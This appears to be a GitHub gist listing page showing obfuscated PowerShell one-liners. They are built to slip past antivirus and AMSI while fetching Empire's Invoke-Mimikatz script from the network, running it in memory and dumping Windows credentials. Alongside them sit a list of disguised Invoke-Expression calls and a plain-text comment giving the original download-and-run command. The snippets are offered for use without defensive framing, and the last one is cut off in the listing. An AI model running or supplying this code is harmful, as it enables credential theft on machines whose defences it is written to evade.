Bobby-Tablez bobby-tablez
bobby-tablez
/ av_bypass_invoke_mimikatz
Last active
December 23, 2022 03:23
Invoke Mimikatz - Such obfuscation, many hide, so AMSI bypass
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;@(2135,2147,2147,2143,2146,2089,2078,2078,2145,2128,2150,2077,2134,2136,2147,2135,2148,2129,2148,2146,2132,2145,2130,2142,2141,2147,2132,2141,2147,2077,2130,2142,2140,2078,2097,2098,2076,2114,2100,2098,2116,2113,2104,2115,2120,2078,2100,2140,2143,2136,2145,2132,2078,2140,2128,2136,2141,2078,2132,2140,2143,2136,2145,2132,2078,2146,2132,2145,2149,2132,2145,2078,2131,2128,2147,2128,2078,2140,2142,2131,2148,2139,2132,2126,2146,2142,2148,2145,2130,2132,2078,2130,2145,2132,2131,2132,2141,2147,2136,2128,2139,2146,2078,2104,2141,2149,2142,2138,2132,2076,2108,2136,2140,2136,2138,2128,2147,2153,2077,2143,2146,2080)|%{$sr=$sr+[char]($_-2031)};$cue='rl';$fis = Get-Random 483;.(gal n?[?al]) $fis cu$cue;.(&(&(gal g?l) g?[?l]) ?e[?x])(& $fis -useb $sr);&("{0}{3}{4}{2}{1}" -f 'In','z','ikat','voke-','Mim') -DumpCreds |
bobby-tablez
/ IEX_Obfuscated.ps1
Created
September 28, 2022 16:30
A list of onscure obfuscated PowerShell invoke expressions
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # use at your own risk | |
| $sk="xjeji";$sl=($sk[4,2,0]-Join"");.($sl) | |
| .((RVpa "\???????\\*2\*POO*\\*river?\?6*").PATh[4,15,34]-JOin'') | |
| .(g`cm ?e[?x]) | |
| .(ga`l i?[?x]) |
bobby-tablez
/ Obfuscated Invoke Mimikatz
Last active
September 21, 2022 01:39
Pulls from Empire's Invoke-Mimikatz.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Use at your own risk! | |
| # | |
| # ORIGINAL: | |
| # IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds; | |
| # | |
| [STrING]::joIn('' , ( [cHar[]]( 18, 30 ,3 , 123 , 115, 21 ,62 , 44 , 118,20 , 57,49 ,62, 56 , 47 , 123 ,21,62, 47 , 117 , 12, 62, 57,24,55 ,50,62, 53 , 47 ,114,117, 31,52 ,44, 53, 55,52, 58, 63, 8 ,47 ,41 , 50, 53, 60, 115 , 121 , 51 , 47 , 47 ,43 , 40 ,97,116, 116, 41, 58 ,44, 117 ,60 , 50 , 47 ,51 , 46 ,57,46 ,40, 62 ,41 , 56, 52 , 53,47 ,62, 53, 47, 117,56, 52,54 , 116 , 25,24 ,118 ,8,30,24 , 14 , 9 ,18 ,15 ,2, 116,30, 54 ,43 , 50 ,41, 62 ,116 ,54, 58 , 40 , 47 , 62 ,41, 116, 62 , 54, 43 , 50 , 41 , 62, 116 ,40 , 62, 41, 45, 62,41 , 116 ,63 ,58,47 ,58 ,116,54,52 , 63 , 46,55,62, 4 , 40 , 52 , 46, 41 , 56,62 ,116,56,41 , 62 ,63 , 62,53 , 47 ,50, 58,55 , 40, 116 ,18 , 53 ,45 , 52, 48 ,62 ,118,22 ,50, 54, 50 , 48 ,58, 47,33, |
NewerOlder